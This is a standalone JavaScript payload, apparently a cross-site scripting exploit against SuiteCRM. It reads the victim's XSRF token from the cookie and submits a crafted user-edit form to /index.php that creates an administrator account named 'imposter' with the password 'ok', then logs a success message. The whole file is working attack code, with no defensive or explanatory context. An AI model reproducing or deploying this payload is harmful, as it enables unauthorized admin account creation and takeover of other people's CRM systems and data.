// Extract XSRF-TOKEN cookie value var xsrfToken = document.cookie.replace(/(?:(?:^|.*;\s*)XSRF-TOKEN\s*=\s*([^;]*).*$)|^.*$/, '$1'); // Prepare the request body var requestBody = `------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="display_tabs_def" display_tabs[]=Home&display_tabs[]=Accounts&display_tabs[]=Contacts&display_tabs[]=Opportunities&display_tabs[]=Leads&display_tabs[]=AOS_Quotes&display_tabs[]=Calendar&display_tabs[]=Documents&display_tabs[]=Emails&display_tabs[]=Campaigns&display_tabs[]=Calls&display_tabs[]=Meetings&display_tabs[]=Tasks&display_tabs[]=Notes&display_tabs[]=AOS_Invoices&display_tabs[]=AOS_Contracts&display_tabs[]=Cases&display_tabs[]=Prospects&display_tabs[]=ProspectLists&display_tabs[]=Project&display_tabs[]=AM_ProjectTemplates&display_tabs[]=FP_events&display_tabs[]=FP_Event_Locations&display_tabs[]=AOS_Products&display_tabs[]=AOS_Product_Categories&display_tabs[]=AOS_PDF_Templates&display_tabs[]=AOR_Reports&display_tabs[]=AOK_KnowledgeBase&display_tabs[]=AOK_Knowledge_Base_Categories&display_tabs[]=EmailTemplates&display_tabs[]=Surveys& ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="hide_tabs_def" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="remove_tabs_def" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="module" Users ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="record" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="action" Save ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="page" EditView ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="return_module" Users ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="return_id" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="return_action" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="password_change" true ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="required_password" 1 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="old_user_name" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="type" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="is_group" 0 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="portal_only" 0 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="is_admin" 1 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="is_current_admin" 1 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="edit_self" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="required_email_address" 0 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="isDuplicate" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="user_name" imposter ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="first_name" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="status" Active ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="last_name" amogus ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="UserType" Administrator ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="deleteAttachment" 0 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="photo" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="photo_record_id" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="photo_escaped" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="photo_file"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="factor_auth" 0 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="employee_status" Active ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="show_on_employees" 0 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="show_on_employees" 1 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="title" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="phone_work" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="department" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="phone_mobile" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="reports_to_name" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="reports_to_id" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="phone_other" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="phone_fax" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="phone_home" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="messenger_type" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="messenger_id" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="address_street" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="address_city" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="address_state" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="address_postalcode" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="address_country" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="description" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="Users_email_widget_id" 0 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="emailAddressWidget" 1 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="Users0emailAddress0" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="Users0emailAddressId0" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="Users0emailAddressVerifiedFlag" true ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="Users0emailAddressVerifiedEmailValue" true ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="Users_email_widget_id" 0 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="emailAddressWidget" 1 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="Users0emailAddressPrimaryFlag" Users0emailAddress0 ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="useEmailWidget" true ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="email_link_type" sugar ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="editor_type" mozaik ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="old_password" ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="new_password" ok ------WebKitFormBoundaryg5QXkKNBVAasICVY Content-Disposition: form-data; name="confirm_new_password" ok ------WebKitFormBoundaryg5QXkKNBVAasICVY`; // Send the POST request to create an admin user var xhr = new XMLHttpRequest(); xhr.open('POST', '/index.php', true); xhr.setRequestHeader('Content-Type', 'multipart/form-data; boundary=----WebKitFormBoundaryg5QXkKNBVAasICVY'); xhr.setRequestHeader('X-XSRF-TOKEN', xsrfToken); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log('Admin user created successfully.'); } }; xhr.send(requestBody);